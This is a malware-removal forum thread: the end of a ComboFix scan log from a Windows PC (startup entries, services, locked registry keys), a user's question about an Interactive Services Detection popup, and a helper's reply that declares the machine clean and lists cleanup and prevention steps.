2014-09-16 21:02 . 2014-05-14 16:23 1973728 ----a-w- c:\windows\system32\wuaueng.dll
2014-09-16 21:02 . 2014-05-14 16:17 2425856 ----a-w- c:\windows\system32\wucltux.dll
2014-09-16 21:02 . 2014-05-14 16:23 36320 ----a-w- c:\windows\system32\wups.dll
2014-09-16 21:02 . 2014-05-14 16:23 581600 ----a-w- c:\windows\system32\wuapi.dll
2014-09-16 21:02 . 2014-05-14 16:17 92672 ----a-w- c:\windows\system32\wudriver.dll
2014-09-16 21:02 . 2014-05-14 13:23 179656 ----a-w- c:\windows\system32\wuwebv.dll
2014-09-16 21:02 . 2014-05-14 13:17 33792 ----a-w- c:\windows\system32\wuapp.exe
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-09-15 13:06 . 2011-10-19 21:14 231568 ------w- c:\windows\system32\MpSigStub.exe
2014-08-29 20:34 . 2014-08-29 20:34 75480 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-08-29 20:22 . 2014-08-29 20:22 33512 ----a-w- c:\windows\system32\drivers\TrueSight.sys
2014-08-29 07:15 . 2010-06-24 15:33 23256 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
2014-08-26 18:32 . 2010-11-20 21:29 376832 ----a-w- c:\windows\system32\rpcss.dll
2014-07-25 06:35 . 2014-07-25 06:35 875688 ----a-w- c:\windows\system32\msvcr120_clr0400.dll
2014-07-19 13:10 . 2011-10-20 14:51 86888 ----a-w- c:\windows\system32\LMIRfsClientNP.dll
2014-07-19 13:10 . 2011-10-20 14:51 53064 ----a-w- c:\windows\system32\Spool\prtprocs\w32x86\LMIproc.dll
2014-07-19 13:10 . 2011-10-20 14:51 31560 ----a-w- c:\windows\system32\LMIport.dll
2014-07-19 13:10 . 2011-10-20 14:51 85832 ----a-w- c:\windows\system32\LMIinit.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt1"]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt2"]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt3"]
@="{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt4"]
@="{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt5"]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt6"]
@="{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt7"]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt8"]
@="{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IAStorIcon"="c:\program files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe" [2011-05-20 284440]
"RTHDVCPL"="c:\program files\Realtek\Audio\HDA\RtHDVCpl.exe" [2011-08-16 10820200]
"NUSB3MON"="c:\program files\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe" [2011-04-14 113288]
"UpdateLBPShortCut"="c:\program files\CyberLink\LabelPrint\MUITransfer\MUIStartMenu.exe" [2009-05-20 222504]
"CLMLServer"="c:\program files\CyberLink\Power2Go\CLMLSvc.exe" [2009-12-15 103720]
"UpdateP2GoShortCut"="c:\program files\CyberLink\Power2Go\MUITransfer\MUIStartMenu.exe" [2009-05-20 222504]
"UCam_Menu"="c:\program files\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe" [2009-02-18 218408]
"UpdatePSTShortCut"="c:\program files\CyberLink\DVD Suite\MUITransfer\MUIStartMenu.exe" [2010-04-20 222504]
"LogMeIn GUI"="c:\program files\LogMeIn\x86\LogMeInSystray.exe" [2010-09-17 63048]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2011-09-01 142616]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2011-09-01 177432]
"Persistence"="c:\windows\system32\igfxpers.exe" [2011-09-01 176408]
"IntelliPoint"="c:\program files\Microsoft IntelliPoint\ipoint.exe" [2011-08-01 1821576]
"itype"="c:\program files\Microsoft IntelliType Pro\itype.exe" [2011-08-10 1313640]
"PC Meter Connect"="c:\program files\Pitney Bowes\PC Meter Connect\mailstationAssistant.exe" [2012-02-07 3514368]
"SBAMTray"="c:\program files\GFI Software\GFIAgent\SBAMTray.exe" [2012-10-16 3226504]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-12-21 959904]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Launcher"="c:\program files\SMINST\Launcher.exe" [2010-04-02 237568]
.
c:\users\bella\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Dropbox.lnk - c:\users\bella\AppData\Roaming\Dropbox\bin\Dropbox.exe /systemstartup [2014-9-12 36414624]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"aux1"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SBAMSvc]
@="Service"
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SBPIMSvc]
@="Service"
.
[HKLM\~\startupfolder\C:^Users^bella^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2010 Screen Clipper and Launcher.lnk]
path=c:\users\bella\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk
backup=c:\windows\pss\OneNote 2010 Screen Clipper and Launcher.lnk.Startup
backupExtension=.Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM]
2013-12-21 06:04 959904 ----a-w- c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SBAMTray]
2012-10-16 20:29 3226504 ----a-w- c:\program files\GFI Software\GFIAgent\SBAMTray.exe
.
R3 DM150Drv;DM150Drv;c:\windows\system32\DRIVERS\DM150Drv.sys [2010-07-30 20600]
R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys [2010-11-20 62464]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe [2014-09-16 108032]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [2010-11-20 52224]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys [2010-11-20 27264]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [2011-10-20 1343400]
R4 SAAZapsc;SAAZ RMM Agent Presence-SC;c:\progra~1\SAAZOD\zRealTime\SAAZapsc.exe SAAZapsc [x]
R4 SAAZRemoteSupport;SAAZRemoteSupport;c:\progra~1\SAAZOD\SAAZRemoteSupport.exe [2011-10-19 78664]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe [2010-09-22 51040]
R4 ZEvtSVC;ZEvtSVC;c:\progra~1\SAAZOD\zSCC\zEvtSVC.exe [2012-11-09 232752]
S2 IAStorDataMgrSvc;Intel(R) Rapid Storage Technology;c:\program files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [2011-05-20 13592]
S2 Intel(R) PROSet Monitoring Service;Intel(R) PROSet Monitoring Service;c:\windows\system32\IProsetMonitor.exe [2011-06-29 112800]
S2 LMIGuardianSvc;LMIGuardianSvc;c:\program files\LogMeIn\x86\LMIGuardianSvc.exe [2014-07-19 375120]
S2 LMIInfo;LogMeIn Kernel Information Provider;c:\program files\LogMeIn\x86\RaInfo.sys [2013-05-24 13624]
S2 MBAMScheduler;MBAMScheduler;c:\progra~1\SAAZOD\Malwarebytes' Anti-Malware\mbamscheduler.exe [2012-09-30 399432]
S2 MBAMService;MBAMService;c:\progra~1\SAAZOD\Malwarebytes' Anti-Malware\mbamservice.exe [2012-09-30 676936]
S2 SAAZappr;SAAZ RMM Agent Presence-PR;c:\progra~1\SAAZOD\zRealTime\SAAZappr.exe SAAZappr [x]
S2 SAAZDPMACTL;SAAZDPMACTL;c:\progra~1\SAAZOD\SAAZDPMACTL.exe [2011-10-19 86856]
S2 SAAZScheduler;SAAZScheduler;c:\progra~1\SAAZOD\SAAZScheduler.exe [2011-10-19 77824]
S2 SAAZServerPlus;SAAZServerPlus;c:\progra~1\SAAZOD\SAAZServerPlus.exe [2009-04-30 77824]
S2 SAAZWatchDog;SAAZWatchDog;c:\progra~1\SAAZOD\SAAZWatchDog.exe [2011-10-19 86856]
S2 SBAMSvc;VIPRE Business;c:\program files\GFI Software\GFIAgent\SBAMSvc.exe [2012-10-16 3675976]
S2 sbapifs;sbapifs;c:\windows\system32\DRIVERS\sbapifs.sys [2012-08-01 66344]
S2 SBPIMSvc;SB Recovery Service;c:\program files\GFI Software\GFIAgent\SBPIMSvc.exe [2012-10-16 175496]
S2 UNS;Intel(R) Management and Security Application User Notification Service;c:\program files\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [2011-05-04 2656536]
S3 dc3d;MS Hardware Device Detection Driver (USB);c:\windows\system32\DRIVERS\dc3d.sys [2011-07-28 45288]
S3 gfiark;gfiark;c:\windows\system32\drivers\gfiark.sys [2013-05-23 43368]
S3 IntcDAud;Intel(R) Display Audio;c:\windows\system32\DRIVERS\IntcDAud.sys [2010-10-15 269824]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2012-09-30 22856]
S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\mbamswissarmy.sys [2014-10-07 40776]
S3 MEI;Intel(R) Management Engine Interface;c:\windows\system32\DRIVERS\HECI.sys [2010-10-19 41088]
S3 nusb3hub;Renesas Electronics USB 3.0 Hub Driver;c:\windows\system32\DRIVERS\nusb3hub.sys [2011-06-10 69504]
S3 nusb3xhc;Renesas Electronics USB 3.0 Host Controller Driver;c:\windows\system32\DRIVERS\nusb3xhc.sys [2011-06-10 161664]
S3 radpms;Driver for RADPMS Device;c:\windows\system32\DRIVERS\radpms.sys [2010-09-17 13408]
S3 sbwtis;sbwtis;c:\windows\system32\DRIVERS\sbwtis.sys [2012-10-16 75552]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - GFIARK
*NewlyCreated* - MBAMPROTECTOR
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12 REG_MULTI_SZ Pml Driver HPZ12 Net Driver HPZ12
.
[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-09-25 02:35 1096520 ----a-w- c:\program files\Google\Chrome\Application\37.0.2062.124\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-10-07 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-17 02:35]
.
2014-10-06 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-10-16 17:50]
.
2014-10-07 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-10-16 17:50]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~2\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~1\MICROS~2\Office14\ONBttnIE.dll/105
Trusted Zone: ncjar.com\events
Trusted Zone: ncjar.com\www
TCP: DhcpNameServer = 192.168.0.20
TCP: Interfaces\{C8C75108-648B-43C0-B933-860C92875C7D}: NameServer = 192.168.0.20,8.8.8.8,208.67.222.222
.
- - - - ORPHANS REMOVED - - - -
.
MSConfigStartUp-BrowserWireless - c:\users\bella\AppData\Local\BrowserWireless\BrowserWireless.dll
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Approved Extensions]
@Denied: (2) (LocalSystem)
"{2318C2B1-4965-11D4-9B18-009027A5CD4F}"=hex:51,66,7a,6c,4c,1d,38,12,df,c1,0b,
27,57,07,ba,54,e4,0e,43,d0,22,fb,89,5b
"{9030D464-4C02-4ABF-8ECC-5164760863C6}"=hex:51,66,7a,6c,4c,1d,38,12,0a,d7,23,
94,30,02,d1,0f,f1,da,12,24,73,56,27,d2
"{AA58ED58-01DD-4D91-8333-CF10577473F7}"=hex:51,66,7a,6c,4c,1d,38,12,36,ee,4b,
ae,ef,4f,ff,08,fc,25,8c,50,52,2a,37,e3
"{B4F3A835-0E21-4959-BA22-42B3008E02FF}"=hex:51,66,7a,6c,4c,1d,38,12,5b,ab,e0,
b0,13,40,37,0c,c5,34,01,f3,05,d0,46,eb
.
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
@Denied: (2) (LocalSystem)
"Timestamp"=hex:a4,03,e1,5a,85,b1,cf,01
.
[HKEY_USERS\S-1-5-21-336078627-3664855205-978596220-1153_Classes\CLSID]
@DACL=(02 0000)
"Default"=hex:01
"OCX"=hex:4d,5a,90,00,03,00,00,00,04,00,00,00,ff,ff,00,00,b8,00,00,00,00,00,00,
00,40,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_11_9_900_170_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_11_9_900_170_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-10-07 05:07:24
ComboFix-quarantined-files.txt 2014-10-07 09:07
ComboFix2.txt 2014-10-06 14:52
ComboFix3.txt 2014-09-01 19:44
ComboFix4.txt 2014-08-28 14:13
ComboFix5.txt 2014-10-07 08:53
.
Pre-Run: 428,413,886,464 bytes free
Post-Run: 428,341,559,296 bytes free
.
- - End Of File - - 0A2C66ACF9D07086933B238E9B17C595
5C616939100B85E558DA92B899A0FC36
 
Sorry, had to get user info first. Things seem to be solid. No reoccurrence of anything that was a problem before.
However I am getting an Interactive Services Detection popup triggering on a dll I do not recognize:

upload_2014-10-14_15-48-46.png
 
I haven't been able to trigger it on purpose yet. It will appear minimized in the user's taskbar to be noticed, and after clearing it will stay away for hours at a time. At some random time it will show back up again, usually a couple hours later. The one I had screenshotted above was a 1pm trigger after it had been cleared at about 9:30am before.

I'll check the eventvwr next time I'm able to get the frequency and/or if it commonly follows another error type.
 
This is definitely not malware related.

You can try this workaround:

  1. Click Start > Control Panel and then double-click Administrative Tools.
  2. Double-click Services.
  3. Scroll down and double-click Interactive Services Detection.
  4. On the General tab, change the Startup type to Manual or Disabled.
  5. Click OK and restart the computer.
..or start new topic in Windows forum.

Here...

Your computer is clean

1. This step will remove all cleaning tools we used, it'll reset restore points (so you won't get reinfected by accidentally using some older restore point) and it'll make some other minor adjustments...
This is a very crucial step so make sure you don't skip it.
Download
51a5ce45263de-delfix.png
DelFix by Xplode to your desktop. Delfix will delete all the used tools and logfiles.

Double-click Delfix.exe to start the tool.
Make sure the following items are checked:
  • Activate UAC (optional; some users prefer to keep it off)
  • Remove disinfection tools
  • Create registry backup
  • Purge System Restore
  • Reset system settings
Now click "Run" and wait patiently.
Once finished a logfile will be created. You don't have to attach it to your next reply.

2. Make sure Windows Updates are current.

3. If any trojans, rootkits or bootkits were listed among your infection(s), make sure, you change all of your on-line important passwords (bank account(s), secured web sites, etc.) immediately!

4. Check if your browser plugins are up to date.
Firefox - https://www.mozilla.org/en-US/plugincheck/
other browsers: https://browsercheck.qualys.com/ (click on "Launch a quick scan now" link)

5. Download, and install WOT (Web OF Trust): http://www.mywot.com/. It'll warn you (in most cases) about dangerous web sites.

6. Run Malwarebytes "Quick scan" once in a while to assure safety of your computer.

7. Run Temporary File Cleaner (TFC), AdwCleaner and Junkware Removal Tool (JRT) weekly (you need to redownload these tools since they were removed by DelFix).

8. Download and install Secunia Personal Software Inspector (PSI): https://www.techspot.com/downloads/4898-secunia-personal-software-inspector-psi.html. The Secunia PSI is a FREE security tool designed to detect vulnerable and out-dated programs and plug-ins which expose your PC to attacks. Run it weekly.

9. (optional) If you want to keep all your programs up to date, download and install FileHippo Update Checker.
The Update Checker will scan your computer for installed software, check the versions and then send this information to FileHippo.com to see if there are any newer releases.

10. When installing\updating ANY program, make sure you always select "Custom " installation, so you can UN-check any possible "drive-by-install" (foistware), like toolbars etc., which may try to install along with the legitimate program. Do NOT click "Next" button without looking at any given page.

11. Read:
How did I get infected?, With steps so it does not happen again!: http://www.bleepingcomputer.com/forums/topic2520.html
Simple and easy ways to keep your computer safe and secure on the Internet: http://www.bleepingcomputer.com/tutorials/keep-your-computer-safe-online/
About those Toolbars and Add-ons - Potentially Unwanted Programs (PUPs) which change your browser settings: http://www.bleepingcomputer.com/for...curity-questions-best-practices/#entry3187642
 
Back